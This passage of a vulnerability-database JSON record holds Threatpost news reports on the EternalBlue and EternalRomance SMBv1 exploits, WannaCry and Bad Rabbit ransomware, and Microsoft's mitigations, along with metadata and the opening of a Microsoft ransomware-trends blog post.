Attackers believed to have [ties to North Korea](<https://threatpost.com/wannacry-shares-code-with-lazarus-apt-samples/125718/>) used the EternalBlue exploit, leaked in April by the ShadowBrokers, to spread the ransomware worldwide on May 12. Hospitals in the U.K., giant telecommunications providers across Europe, and many businesses in Russia and across Asia fell victim to WannaCry, which eventually infected unpatched Windows servers running SMBv1 in more than 150 countries.\n\nMicrosoft had [patched the SMBv1 vulnerability](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) in question in March in MS17-010, one month before the ShadowBrokers\u2019 leak, and urged admins worldwide to install the patch immediately. The WannaCry outbreak, however, demonstrated that many organizations did not heed those warnings; the ransomware, generally derided for its shoddy coding, still managed to infect more than 200,000 servers.\n\nThe weaponized version of EternalBlue released by the ShadowBrokers is effective against only Windows 7 and Windows XP machines, but researchers at RiskSense were able to build a [Windows 10 port](<https://threatpost.com/nsas-eternalblue-exploit-ported-to-windows-10/126087/>) that bypasses some of the mitigations in the Current Branch for Business version of the operating system. While a report on RiskSense\u2019s Windows 10 version of the attack is available, researchers won\u2019t release new offsets used to weaponize their attack.\n\nMicrosoft, meanwhile, continues to plead with users running legacy versions of Windows to upgrade to Windows 10. The current version of the operating system includes a number of [mitigations](<https://threatpost.com/windows-10-mitigations-make-future-eternalblue-attacks-difficult/126132/>) to deny EternalBlue and other weapons-grade Windows attacks leaked in April. 
Researchers echo those pleas as well, praising Windows 10\u2019s mitigations such as kernel ASLR and DEP and virtualization-based security in Device Guard.\n\nMicrosoft this week released an [analysis of EternalBlue and EternalRomance](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), another SMB remote code execution attack, and describes how each of the above mitigations, in addition to kernel Control Flow Guard, breaks the exploits available in the wild.\n\n\u201cThrough VBS\u2019s usage of CPU hypervisor functionality, Device Guard-enabled systems can verify and enforce integrity of code that\u2019s mapped in the kernel address space,\u201d wrote Viktor Brange of the Windows Offensive Security Research Team. \u201ckCFG prevents many exploitation techniques that rely on corrupting function pointers to achieve code execution.\u201d\n\nWhile EternalBlue and its [DoublePulsar backdoor](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) have been studied on many fronts, EternalRomance is another SMBv1 attack that exploits a separate vulnerability, CVE-2017-0145, to gain remote code execution capabilities.\n\n\u201cThis exploit was written to remotely install and launch an SMB backdoor. At the core of this exploit is a type confusion vulnerability leading to an attacker offset controlled arbitrary heap write,\u201d Brange wrote. \u201cAs with almost any heap corruption exploit, the attacker must know or control the layout of the heap to consistently succeed. 
With SMB, most objects are allocated in the non-paged pool.\u201d\n\nIn its analysis, Microsoft explains how an attacker could learn a reliable heap layout, build primitives from corruption of the heap, and how all this enables installation of the in-memory backdoor.\n\nIn addition to patching, Microsoft warns that customers exposing port 445 to the internet are making a massive mistake, and that SMB should be run inside the firewall.\n\n\u201cHowever, if an attacker has access to a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise,\u201d Microsoft said.\n", "published": "2017-06-20T08:41:13", "modified": "2017-06-26T19:14:10", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/say-goodbye-to-smbv1-in-windows-fall-creators-update/126387/", "reporter": "Michael Mimoso", "references": ["https://threatpost.com/leaked-nsa-exploit-spreading-ransomware-worldwide/125654/", "https://threatpost.com/someone-failed-to-contain-wannacry/126335/", "https://threatpost.com/wannacry-shares-code-with-lazarus-apt-samples/125718/", "https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/", "https://threatpost.com/nsas-eternalblue-exploit-ported-to-windows-10/126087/", "https://threatpost.com/windows-10-mitigations-make-future-eternalblue-attacks-difficult/126132/", "https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/", "https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/"], "cvelist": ["CVE-2017-0145"], "lastseen": "2018-10-06T22:53:32", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2018-10-06T22:53:32", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", 
"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:650FC16DA0E29CB420C07AFBAE04975B", "THREATPOST:B304599C15AAF854E03A81B1E0ADE266", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:A8C0E6204F3BAD7A47B000396784E9F3", "THREATPOST:77FA220EA5F50111A13B99DBCBA23056", "THREATPOST:0DADADE0EE7F12281751AAC885E7F84B", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:889131AAE542197C8EEEF4B05D87D477", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2018-10-06T22:53:32", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.threatpost.ThreatpostBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "hash": "fd10306305813faafb2a2ad8d6b050fb", "type": "threatpost", "bulletinFamily": "info", "title": "EternalRomance Exploit Found in Bad Rabbit Ransomware", "description": "One day after [clear ties were established](<https://threatpost.com/bad-rabbit-linked-to-expetrnot-petya-attacks/128611/>) between the [Bad Rabbit ransomware](<https://threatpost.com/badrabbit-ransomware-attacks-hitting-russia-ukraine/128593/>) attacks and this summer\u2019s NotPetya outbreak, researchers at Cisco today strengthened that bond disclosing that the leaked NSA exploit EternalRomance was used to spread the malware on compromised networks.\n\nThis contradicts earlier reports that neither 
EternalRomance nor EternalBlue were part of this week\u2019s ransomware attack that was confined primarily to Russia and the Ukraine.\n\nCisco said in an [ongoing analysis of Bad Rabbit](<http://blog.talosintelligence.com/2017/10/bad-rabbit.html>) that the implementation of the EternalRomance exploit used in Bad Rabbit has been modified.\n\n\u201cThis is a different implementation of the EternalRomance exploit,\u201d said Martin Lee, technical lead of security research for Cisco\u2019s research arm, Talos. \u201cIt\u2019s different code from what we saw used in NotPetya, but exploiting the same vulnerability in a slightly different implementation.\u201d\n\nEternalRomance is one of a number of Windows exploits [leaked in April by the ShadowBrokers](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>), a still unidentified group that has been [leaking Equation Group exploits](<https://threatpost.com/shadowbrokers-leak-has-strong-connection-to-equation-group/119941/>) for more than a year. Many of those attacks, however, were mitigated in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), a Microsoft security bulletin that included patches for vulnerabilities in the SMBv1 protocol abused by these exploits.\n\nThe publicly available exploits affect older versions of Windows (XP through 7 on the client side and 2003-2008 on Windows Server).\n\nEternalRomance is a remote code execution attack that exploits CVE-2017-0145. What exacerbated the WannaCry and NotPetya attacks was the fact that many organizations had SMBv1 exposed to the internet rather than solely internally. This allowed WannaCry in particular to worm out to the internet and affect machines outside a compromised network.\n\n\u201cThis exploit was written to remotely install and launch an SMB backdoor. 
At the core of this exploit is a type confusion vulnerability leading to an attacker offset controlled arbitrary heap write,\u201d Microsoft said in [an analysis of EternalRomance](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) published in June. \u201cAs with almost any heap corruption exploit, the attacker must know or control the layout of the heap to consistently succeed.\u201d\n\nCisco said in its look at Bad Rabbit this week that it found a type confusion attempt similar to EternalRomance.\n\n\u201cWe can be fairly confident that BadRabbit includes an EternalRomance implementation used to overwrite a kernel\u2019s session security context to enable it to launch remote services, while in Nyetya it was used to install the DoublePulsar backdoor,\u201d Cisco said. \u201cBoth actions are possible due to the fact that EternalRomance allows the attacker to read/write arbitrary data into the kernel memory space.\u201d\n\nDoublePulsar is a post-exploitation memory-based kernel payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish. It was part of the Fuzzbunch exploit platform leaked by the Shadowbrokers.\n\n\u201cThis is a full ring0 payload that gives you full control over the system and you can do what you want to it,\u201d said Sean Dillon, senior security analyst at RiskSense. Dillon was the first to reverse-engineer a DoublePulsar payload, and published his [analysis](<https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html>) in April.\n\nResearchers at Kaspersky Lab on Wednesday confirmed the link between Bad Rabbit and NotPetya, finding similarities in the hashing algorithm used in the two attacks, as well as some of the same domains. 
It also steals credentials by leveraging the Windows utility WMIC.\n\nUnlike NotPetya, Bad Rabbit is not a wiper attack, Kaspersky Lab confirmed today. Cisco\u2019s Lee also confirmed this is not a wiper.\n\n\u201cThe researchers also found that the Bad Rabbit ransomware code doesn\u2019t contain the kind of mistakes that could be used to decrypt victims\u2019 files and data. There is no way to decrypt information without the attackers\u2019 private key,\u201d Kaspersky Lab said today. \u201cHaving said that, the experts have found a flaw in the code of dispci.exe, which means that the malware doesn\u2019t wipe the generated password from the memory \u2013 so there is a slim possibility to extract it.\u201d\n\nKaspersky Lab also said that it saw traces of the attack dating back to July starting with the compromise of high-profile media sites in Russia including Interfax. Government agencies in Turkey, including the metro in Kiev and a major airport were also serving the malware as were other sites in Turkey, Germany and the U.S.\u2014about 200 in all. The attackers, however, pulled the malicious code once Bad Rabbit was made public.\n\nThe malware was spreading primarily through drive-by downloads where the hacked sites were serving up a phony Flash Player installer that executes a dropper on the compromised machine that reaches out to the attacker\u2019s domain for the rest of the attack. The malware relied on user action to trigger the executable and to grant it excessive permissions through a Windows UAC prompt.\n\nWhile ExPetr was wiper malware in the guise of a ransomware attack, Bad Rabbit installs a malicious executable called dispci.exe which is derived from the free and open source disk encryption software called DiskCryptor.\n\n\u201cThe malware modifies the Master Boot Record (MBR) of the infected system\u2019s hard drive to redirect the boot process into the malware authors code for the purposes of displaying a ransom note,\u201d Cisco said. 
\u201cThe ransom note that is displayed following the system reboot is very similar to the ransom notes displayed by other ransomware variants, namely Petya, that we have observed in other notable attacks this year.\u201d\n\nThe attackers are demanding 0.05 Bitcoin or $298 USD at today\u2019s exchange rate in exchange for the decryption key that will unlock their hard drives. Each victim is assigned a unique payment wallet, simplifying the process for recovery for victims and profit for the attackers.\n", "published": "2017-10-26T13:53:40", "modified": "2017-10-26T13:53:40", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/", "reporter": "Michael Mimoso", "references": ["https://threatpost.com/bad-rabbit-linked-to-expetrnot-petya-attacks/128611/", "https://threatpost.com/badrabbit-ransomware-attacks-hitting-russia-ukraine/128593/", "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", "https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/", "https://threatpost.com/shadowbrokers-leak-has-strong-connection-to-equation-group/119941/", "https://technet.microsoft.com/en-us/library/security/ms17-010.aspx", "https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html"], "cvelist": ["CVE-2017-0145"], "lastseen": "2019-01-23T05:28:27", "history": [{"bulletin": {"id": "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "hash": "a03b87312b3d2b43c42f11b9245307fa", "type": "threatpost", "bulletinFamily": "info", "title": "EternalRomance Exploit Found in Bad Rabbit Ransomware", "description": "One day after [clear ties were established](<https://threatpost.com/bad-rabbit-linked-to-expetrnot-petya-attacks/128611/>) between the [Bad 
Rabbit ransomware](<https://threatpost.com/badrabbit-ransomware-attacks-hitting-russia-ukraine/128593/>) attacks and this summer\u2019s NotPetya outbreak, researchers at Cisco today strengthened that bond disclosing that the leaked NSA exploit EternalRomance was used to spread the malware on compromised networks.\n\nThis contradicts earlier reports that neither EternalRomance nor EternalBlue were part of this week\u2019s ransomware attack that was confined primarily to Russia and the Ukraine.\n\nCisco said in an [ongoing analysis of Bad Rabbit](<http://blog.talosintelligence.com/2017/10/bad-rabbit.html>) that the implementation of the EternalRomance exploit used in Bad Rabbit has been modified.\n\n\u201cThis is a different implementation of the EternalRomance exploit,\u201d said Martin Lee, technical lead of security research for Cisco\u2019s research arm, Talos. \u201cIt\u2019s different code from what we saw used in NotPetya, but exploiting the same vulnerability in a slightly different implementation.\u201d\n\nEternalRomance is one of a number of Windows exploits [leaked in April by the ShadowBrokers](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>), a still unidentified group that has been [leaking Equation Group exploits](<https://threatpost.com/shadowbrokers-leak-has-strong-connection-to-equation-group/119941/>) for more than a year. Many of those attacks, however, were mitigated in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), a Microsoft security bulletin that included patches for vulnerabilities in the SMBv1 protocol abused by these exploits.\n\nThe publicly available exploits affect older versions of Windows (XP through 7 on the client side and 2003-2008 on Windows Server).\n\nEternalRomance is a remote code execution attack that exploits CVE-2017-0145. 
What exacerbated the WannaCry and NotPetya attacks was the fact that many organizations had SMBv1 exposed to the internet rather than solely internally. This allowed WannaCry in particular to worm out to the internet and affect machines outside a compromised network.\n\n\u201cThis exploit was written to remotely install and launch an SMB backdoor. At the core of this exploit is a type confusion vulnerability leading to an attacker offset controlled arbitrary heap write,\u201d Microsoft said in [an analysis of EternalRomance](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) published in June. \u201cAs with almost any heap corruption exploit, the attacker must know or control the layout of the heap to consistently succeed.\u201d\n\nCisco said in its look at Bad Rabbit this week that it found a type confusion attempt similar to EternalRomance.\n\n\u201cWe can be fairly confident that BadRabbit includes an EternalRomance implementation used to overwrite a kernel\u2019s session security context to enable it to launch remote services, while in Nyetya it was used to install the DoublePulsar backdoor,\u201d Cisco said. \u201cBoth actions are possible due to the fact that EternalRomance allows the attacker to read/write arbitrary data into the kernel memory space.\u201d\n\nDoublePulsar is a post-exploitation memory-based kernel payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish. It was part of the Fuzzbunch exploit platform leaked by the Shadowbrokers.\n\n\u201cThis is a full ring0 payload that gives you full control over the system and you can do what you want to it,\u201d said Sean Dillon, senior security analyst at RiskSense. 
Dillon was the first to reverse-engineer a DoublePulsar payload, and published his [analysis](<https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html>) in April.\n\nResearchers at Kaspersky Lab on Wednesday confirmed the link between Bad Rabbit and NotPetya, finding similarities in the hashing algorithm used in the two attacks, as well as some of the same domains. It also steals credentials by leveraging the Windows utility WMIC.\n\nUnlike NotPetya, Bad Rabbit is not a wiper attack, Kaspersky Lab confirmed today. Cisco\u2019s Lee also confirmed this is not a wiper.\n\n\u201cThe researchers also found that the Bad Rabbit ransomware code doesn\u2019t contain the kind of mistakes that could be used to decrypt victims\u2019 files and data. There is no way to decrypt information without the attackers\u2019 private key,\u201d Kaspersky Lab said today. \u201cHaving said that, the experts have found a flaw in the code of dispci.exe, which means that the malware doesn\u2019t wipe the generated password from the memory \u2013 so there is a slim possibility to extract it.\u201d\n\nKaspersky Lab also said that it saw traces of the attack dating back to July starting with the compromise of high-profile media sites in Russia including Interfax. Government agencies in Turkey, including the metro in Kiev and a major airport were also serving the malware as were other sites in Turkey, Germany and the U.S.\u2014about 200 in all. The attackers, however, pulled the malicious code once Bad Rabbit was made public.\n\nThe malware was spreading primarily through drive-by downloads where the hacked sites were serving up a phony Flash Player installer that executes a dropper on the compromised machine that reaches out to the attacker\u2019s domain for the rest of the attack. 
The malware relied on user action to trigger the executable and to grant it excessive permissions through a Windows UAC prompt.\n\nWhile ExPetr was wiper malware in the guise of a ransomware attack, Bad Rabbit installs a malicious executable called dispci.exe which is derived from the free and open source disk encryption software called DiskCryptor.\n\n\u201cThe malware modifies the Master Boot Record (MBR) of the infected system\u2019s hard drive to redirect the boot process into the malware authors code for the purposes of displaying a ransom note,\u201d Cisco said. \u201cThe ransom note that is displayed following the system reboot is very similar to the ransom notes displayed by other ransomware variants, namely Petya, that we have observed in other notable attacks this year.\u201d\n\nThe attackers are demanding 0.05 Bitcoin or $298 USD at today\u2019s exchange rate in exchange for the decryption key that will unlock their hard drives. Each victim is assigned a unique payment wallet, simplifying the process for recovery for victims and profit for the attackers.\n", "published": "2017-10-26T13:53:40", "modified": "2018-03-01T22:34:02", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/", "reporter": "Michael Mimoso", "references": ["https://threatpost.com/bad-rabbit-linked-to-expetrnot-petya-attacks/128611/", "https://threatpost.com/badrabbit-ransomware-attacks-hitting-russia-ukraine/128593/", "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", "https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/", "https://threatpost.com/shadowbrokers-leak-has-strong-connection-to-equation-group/119941/", "https://technet.microsoft.com/en-us/library/security/ms17-010.aspx", 
"https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html"], "cvelist": ["CVE-2017-0145"], "lastseen": "2018-10-06T22:52:59", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 9.3, "vector": "NONE", "modified": "2018-10-06T22:52:59"}}, "objectVersion": "1.4"}, "lastseen": "2018-10-06T22:52:59", "differentElements": ["modified"], "edition": 1}], "viewCount": 7, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2019-01-23T05:28:27", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:AA6D3EA1C08F9351B439C71FBB922DC0", "THREATPOST:1C21561E1E395A6D3467AA1021D15E29", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:66026C087D3B47DD603E93D1B2559B16", 
"THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2019-01-23T05:28:27", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.threatpost.ThreatpostBulletin", "_object_types": ["robots.models.threatpost.ThreatpostBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}], "mmpc": [{"cvss": 
{"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "history": [{"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "In the first six months of 2017, [ransomware](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>) threats reached new levels of sophistication. The same period also saw the reversal of a [six-month downward trend](<https://blogs.technet.microsoft.com/mmpc/2017/02/14/ransomware-2016-threat-landscape-review/>) in ransomware encounters. New ransomware code was released at a higher rate with increasing complexity. Two high-profile ransomware incidents brought cybersecurity to the forefront of mainstream conversations as the impact of attacks was felt around the world by organizations and individuals alike.\n\nThe recently released [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) summarizing movements in different areas of the threat landscape in the first quarter of the year showed the continued global presence of ransomware. The highest encounter rates, defined as the percentage of computers running Microsoft real-time security products that report blocking or detecting ransomware, were registered in the Czech Republic, Korea, and Italy from January to March 2017.\n\nSustained ransomware campaigns and high-profile attacks continued to highlight the need for advanced comprehensive cybersecurity strategy. 
In this blog entry, we share our key observations on the ransomware landscape and offer insights on what can be learned from trends and developments so far in 2017.\n\n## Ransomware growth rallies\n\nIn March of 2017, the volume of ransomware encounters started to pick up again after several months of decline. The growth is driven to a certain extent by sustained activities from established ransomware operations like [Cerber](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Cerber>), with an onslaught of attacks powered by [ransomware-as-a-service](<https://www.microsoft.com/en-us/wdsi/help/antimalware-security-glossary#ransomware-as-a-service>).\n\n![](https://msdnshared.blob.core.windows.net/media/2017/08/ransomware-1h-2017-review-fig1-monthly-ransomware-encounters.png)\n\n_Figure 1. Total ransomware encounters by month, July 2016-June 2017 (source: _[_Ransomware FAQ page_](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>)_)_\n\nIn part, this surge is also driven by the emergence of new ransomware families, which are being released into the wild at a faster rate. In the first half of 2017, we discovered 71 new ransomware families, an increase from the 64 new families we found in the same period in 2016.\n\nSome of these new ransomware families stand out because they exhibit new behaviors that make them more complex. For instance, the latest [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) shows that in March 2017, two-month old [Spora](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Spora.A>) overtook Cerber as the most prevalent ransomware family.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/08/ransomware-1h-2017-review-fig2-trends-ransomware-families.png)\n\n_Figure 2. 
Trends for several commonly encountered ransomware families in 1Q17, by month (source: _[_Microsoft Security Intelligence Report 22_](<https://www.microsoft.com/en-us/security/intelligence-report>)_)_\n\nSpora\u2019s quick rise to the top may be traced to its capability to spread via network drives and removable drives, such as USB sticks. Initial versions targeted Russia and featured a ransom note in the local language. It has since gone global, spreading to other countries with a ransom note in English.\n\nOther notable new ransomware families in 2017 include [Jaffrans](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Jaffrans>), [Exmas](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Exmas>), and [Ergop](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Ergop.A>). While these families have not quite achieved the prevalence of Spora, they show signs of persistence and periodic improvements that are observed in older, successful families.\n\nMicrosoft protects customers from new and emerging ransomware like Spora using a combination of advanced heuristics, generics, and machine learning, which work together to deliver predictive, real-time protection. In a recent blog 